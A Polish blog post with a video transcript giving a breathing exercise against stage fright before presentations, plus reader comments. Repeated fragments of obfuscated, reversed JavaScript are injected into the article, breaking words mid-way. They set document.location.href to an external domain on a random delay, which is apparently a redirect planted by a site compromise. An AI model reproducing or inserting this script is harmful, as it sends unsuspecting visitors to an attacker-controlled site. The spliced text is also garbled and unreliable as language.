Dziś rozpoczynam nowy cykl filmowy o nazwie quick tip video. Będę tu publikować krótkie filmiki – max 2 minuty z poradami dla mówców, ale z poradami z… przymrużeniem oka 🙂 Z resztą co tu dużo gadać. Obejrzyj film:
Tu możesz przeczytać transkrypt nagrania:
– Robercie, rozpoczynam moja przygodę z prezentacjami i bardzo się denerwuję przed każdym wystąpieniem. Czy możesz mi coś poradzić? – pyta Tomek z Wronek.
– Tak Tomku, mogę – odpowiada Robert 🙂
Mam, Tomku dla Ciebie proste oddechowe ćwiczenie antystresowe, możesz je wykonać tuż przed rozpoczęciem prezentacji. Nie wymaga ona ani specjalnych umiejętności, ani miejsca. Możesz je wykonać… przed publicznością! Otoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to ono:
1. Stań wyprostoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towany
2. Zamknij oczy
3. Weź głęboki oddech (wdychaj powietrze nosem)
4. Przytrzymaj 2-3 sekundy powietrze
5. Zrób wydech (wypuść powietrze ustami)
Zrób np. serię 10 wdechów mi wydechów.
Bardzo ważne: gdy wdychasz powietrze, rób toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to przeponą a nie szczytami płuc! Gdy oddychasz przeponą, nabierasz toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do płuc więcej powietrza – starczy Ci go na dłużej i nie będziesz kończyć zdań na “bezdechu”. Na toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dodatek Twój głos będzie mocniejszy i pewniejszy.
Jak sprawdzić czy oddychasz prawidłowo?
Podczas wdechu powinien się unosić twój brzuch – toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to oznacza, że oddychasz przeponą. Gdy unosi się klatka piersiowa toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to oddychasz tylko płucami. Twój oddech jest krótki, płytki i nerwowy. W takich sytuacjach zapewne braknie Ci powietrza na końcu zdania…
Zrób kilka takich głębokich wdechów tuz przed wystąpieniem a na pewno będziesz spokojniejszy i mniej zestresowany. Rób takie ćwiczenie w każdej stresującej sytuacji: przed egzaminem, rozmową z szefem itd.
Pamiętaj o oddychaniu przeponą!
pozdrawiam i mam nadzieję, że pomogłem!
– – – – – – – – – – – – – – – – – – – – – – – – – –
Jeśli film i artykuł spotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobały Ci się, kliknij w “Lubię toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to”, wtedy Twoi wszyscy znajomi toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowiedzą się o tym, że masz dla nich “ciekawe znalezisko w sieci” 🙂
A możę masz własne pomysły na radzenie sobie ze stresem? Wpisz komentarz toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do tego artykułu
– – – – – – – – – – – – – – – – – – – – – – – – –
![]() |
Wpis Ci się podobał?
Świeżutkie artykuły i filmy na temat prezentacji i rozwoju osobistego wprost na Twoją skrzynkę!
Witam.
Prawdopodobnie, skuteczniejsze jest to ćwiczenie, gdy zaczynamy od “głębokiego wydechu z przepony” – opróżniamy wtedy zastały CO2 ze “skrajnych połaci płuc”, zastępując go O2, a nie wtłaczamy go głębiej, jak w przypadku, gdy zaczynamy od wdechu.
Pozdrawiam.
Jan.
Janie,
zaproponowane przeze mnie ćwiczenie na pewno na początek wystarczy – aby wzmocnić efekt proponuję dodatkowo: w momencie wdechu powiedzieć sobie w myślach “wdycham spokój” a wydychając powietrze – “wydycham lęk/stres/strach”. To naprawdę pomaga!
co do Twojej propozycji – na pewno skorzystam przy kolejnej stresowej sytuacji i oczyszczę płuca na maxa 🙂
pozdrawiam
Robercie,
to ćwiczenie oddechowe nie jest aż tak uniwersalne jak myślisz i nie pomaga każdemu. Na mnie nie działa w sytuacji stresowej i nie dlatego, że nieodpowiednio oddycham. Ćwiczę od roku jogę i naprawdę wiem jak oddychać i potrafię się zrelaksować. Zrelaksować w sytuacji, które temu sprzyja.
Jednak przed wystąpieniem publicznym, które miałam po dłuższej przerwie (wcześniej się już przyzwyczaiłam i nie stresowałam) miałam niespodziewanie ogromną tremę. Nie pomogło oddychanie przeponowe, ani żaden inny sposób.
Może znasz jeszcze jakieś metody dla “opornych”? 🙂
Pozdrawiam.
P.S. Jan może mieć rację… 🙂
Basiu,
nie na wszystkich to działa, rzeczywiście. Takie ćwiczenie to próba likwidacji skutków a nie przyczyny. Konieczna jest zmiana sposobu myślenia przed prezentacją. Mam kilka nowych pomysłów na ten temat. Część z nich opublikowałem w Tajnej Księdze Mówców. Natomiast w najbliższym czasie przygotuję szkolenie video z ćwiczeniami dla mówców, a w nim znajdzie się moduł jak radzić sobie ze stresem. Tych pomysłów nie prezentowałem wcześniej.
pozdrawiam